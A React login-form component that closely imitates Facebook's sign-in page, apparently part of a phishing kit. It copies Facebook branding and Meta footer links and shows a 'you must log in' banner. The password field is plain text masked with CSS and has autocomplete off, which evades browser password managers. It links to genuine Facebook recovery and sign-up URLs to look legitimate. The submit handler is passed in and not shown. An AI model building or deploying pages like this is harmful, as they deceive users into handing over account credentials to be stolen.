/* eslint-disable jsx-a11y/anchor-is-valid */
import { loginForm, SupportedLang } from "../../pages/language";
import { Eye, EyeOff } from "lucide-react";
import { useEffect, useState } from "react";
interface LoginFormProps {
  email: string;
  password: string;
  showPassword: boolean;
  loading: boolean;
  loginFailed: boolean;
  isError: boolean;
  isPassInvalid: boolean;
  onEmailChange: (e: React.ChangeEvent<HTMLInputElement>) => void;
  onPasswordChange: (e: React.ChangeEvent<HTMLInputElement>) => void;
  onTogglePassword: () => void;
  onSubmit: () => void;
}

export const LoginForm = ({
  email,
  password,
  showPassword,
  loading,
  loginFailed,
  isError,
  isPassInvalid,
  onEmailChange,
  onPasswordChange,
  onTogglePassword,
  onSubmit
}: LoginFormProps) => {
  const [lang, setLang] = useState<SupportedLang>("en");
  useEffect(() => {
    const browserLang = navigator.language?.slice(0, 2); // ví dụ: "de-DE" → "de"
    const supportedLangs = ["de", "it", "es", "fr"];
    if (supportedLangs.includes(browserLang)) {
      setLang(browserLang as SupportedLang);
    } else {
      setLang("en");
    }
  }, []);
  return (
    <div className="w-full">
      <div className="w-full px-4 md:px-0 max-w-[550px] mx-auto flex flex-col items-center justify-center">
        {/* Facebook header */}
        <div className="text-center text-[36px] font-bold text-[#1877f2] mb-6">
          facebook
        </div>
        <div className="w-full border border-[#1877f2] text-[#1c1e21] text-[13px] rounded-[2px] mb-3 h-[30px] flex items-center">
          <div className="bg-[#1877f2] w-[30px] h-full flex items-center justify-center ">
            <svg
              xmlns="http://www.w3.org/2000/svg"
              className="h-[14px] w-[14px] text-white"
              fill="currentColor"
              viewBox="0 0 16 16"
            >
              <path d="M8 15A7 7 0 1 0 8 1a7 7 0 0 0 0 14zm.93-9.412-.588 4.824a.552.552 0 0 1-1.096 0L6.657 5.588a.552.552 0 0 1 1.096 0l.177 1.465.177-1.465a.552.552 0 0 1 1.096 0zM8 11a.905.905 0 1 1 0-1.81A.905.905 0 0 1 8 11z" />
            </svg>
          </div>
          <div className="px-3 py-[10px]">{loginForm[lang].mustLogin}</div>
        </div>

        {/* Form container */}
        <div className="w-full max-w-[400px] bg-white shadow-md rounded-lg px-6 py-6 space-y-4">
          <div className="text-center text-[20px] text-[#1c1e21] font-medium mb-3">
            {loginForm[lang].loginToFacebook}
          </div>

          <div className="bg-[#fff3cd] border border-[#f5cb4e] text-center text-gray-800 text-xs px-4 py-2 rounded-[2px] mb-3">
            {loginForm[lang].mustLogin}
          </div>

          <div className="space-y-3">
            <input
              type="text"
              placeholder={loginForm[lang].emailOrPhone}
              value={email}
              onChange={onEmailChange}
              className="w-full px-3 py-2 border border-[#ccd0d5] rounded focus:outline-none text-base"
            />

            <div className="relative">
              <input
                type="text"
                value={password}
                onChange={onPasswordChange}
                placeholder={loginForm[lang].password}
                autoComplete="off"
                inputMode="text"
                className={`w-full px-3 py-2 border border-[#ccd0d5] rounded pr-10 focus:outline-none text-base`}
                style={{
                  ...(showPassword
                    ? {}
                    : ({ WebkitTextSecurity: "disc" } as React.CSSProperties))
                }}
              />

              <div
                className="absolute right-3 top-1/2 transform -translate-y-1/2 text-gray-500 cursor-pointer"
                onClick={onTogglePassword}
              >
                {showPassword ? <EyeOff size={16} /> : <Eye size={16} />}
              </div>
            </div>

            {loginFailed && (
              <div className="text-red-600 text-sm text-center">
                {loginForm[lang].invalidUserPass}
              </div>
            )}
            {isPassInvalid && (
              <div className="text-red-600 text-sm text-center">
                {loginForm[lang].passwordTooShort}
              </div>
            )}
            {isError && (
              <div className="text-red-600 text-sm text-center">
                {loginForm[lang].unexpectedError}
              </div>
            )}

            <button
              onClick={onSubmit}
              disabled={loading}
              className={`w-full h-10 bg-[#1877f2] text-white rounded text-base font-semibold flex items-center justify-center ${
                loading
                  ? "opacity-100 cursor-not-allowed"
                  : "hover:bg-[#166fe5]"
              }`}
            >
              {loading ? (
                <div className="w-5 h-5 border-[2px] border-white border-t-transparent rounded-full animate-spin"></div>
              ) : (
                loginForm[lang].login
              )}
            </button>

            <div className="text-center">
              <a
                href={`https://www.facebook.com/recover/initiate?email=${email}`}
                className="text-[#1877f2] text-[13px] font-normal hover:underline"
                target="_blank"
                rel="noreferrer"
              >
                {loginForm[lang].forgotten}
              </a>
            </div>

            <div className="flex items-center gap-4">
              <div className="flex-1 h-px bg-gray-300"></div>
              <span className="text-[13px] text-gray-500">
                {loginForm[lang].or}
              </span>
              <div className="flex-1 h-px bg-gray-300"></div>
            </div>

            <div className="text-center">
              <button
                onClick={() =>
                  window.location.replace("https://www.facebook.com/reg")
                }
                className="bg-[#42b72a] hover:bg-[#36a420] text-white font-semibold text-[15px] py-[6px] px-4 rounded"
              >
                {loginForm[lang].createAccount}
              </button>
            </div>
          </div>
        </div>
      </div>

      {/* Footer Language & Links */}
      <div className="mt-6 bg-white py-4">
        <div className="flex flex-wrap justify-center gap-x-3 text-[12px] text-[#737373] mb-2 border-b border-[#e9e9e9] pb-2">
          <span>English (UK)</span>
          <span>Polski</span>
          <span>Español</span>
          <span>Français (France)</span>
          <span>Italiano</span>
          <span>Lietuvių</span>
          <span>Română</span>
          <span>中文(简体)</span>
          <span>Português (Brasil)</span>
          <span>Deutsch</span>
          <span>العربية</span>
          <span className="font-bold bg-gray-200 px-2 rounded-[2px] border border-[#ccc]">
            ＋
          </span>
        </div>
        <div className="hidden sm:flex flex-wrap justify-center gap-x-3 gap-y-1 text-[11px] text-[#737373] mb-2 text-center">
          <span>Sign Up</span>
          <span>Log in</span>
          <span>Messenger</span>
          <span>Facebook Lite</span>
          <span>Video</span>
          <span>Meta Pay</span>
          <span>Meta Store</span>
          <span>Meta Quest</span>
          <span>Meta AI</span>
          <span>Instagram</span>
          <span>Threads</span>
          <span>Cookies</span>
          <span>AdChoices</span>
          <span>Privacy</span>
          <span>Terms</span>
          <span>Help</span>
          <span>About</span>
          <span>Contact uploading and non-users</span>
        </div>

        <div className="text-center text-[11px] text-[#737373]">
          Meta © {new Date().getFullYear()}
        </div>
      </div>
    </div>
  );
};

export default LoginForm;
